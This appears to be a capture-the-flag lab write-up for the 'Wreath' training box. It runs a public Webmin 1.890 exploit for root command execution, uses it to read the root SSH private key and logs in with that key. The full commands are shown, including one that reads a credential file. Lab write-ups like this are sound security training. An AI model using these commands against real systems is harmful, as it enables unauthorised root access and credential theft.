Adding to /etc/hosts:
Now visiting https://thomaswreath.thm:10000:
We have a login page
Searching webmin on searchsploit:
searchsploit Webmin
According to nmap scan we have 1.890 Webmin.
Using this exploit
python3 webmin-1.890_exploit.py thomaswreath.thm 10000 whoami
We are root user and we have command execution.
Now trying to get ssh keys:
python3 webmin-1.890_exploit.py thomaswreath.thm 10000 'cat /root/.ssh/id_rsa'
We have ssh keys.
Copy to a file id_rsa and change permissions so that the permissions are not too open:
chmod 600 id_rsa
Now connect using ssh:
ssh [email protected] -i id_rsa
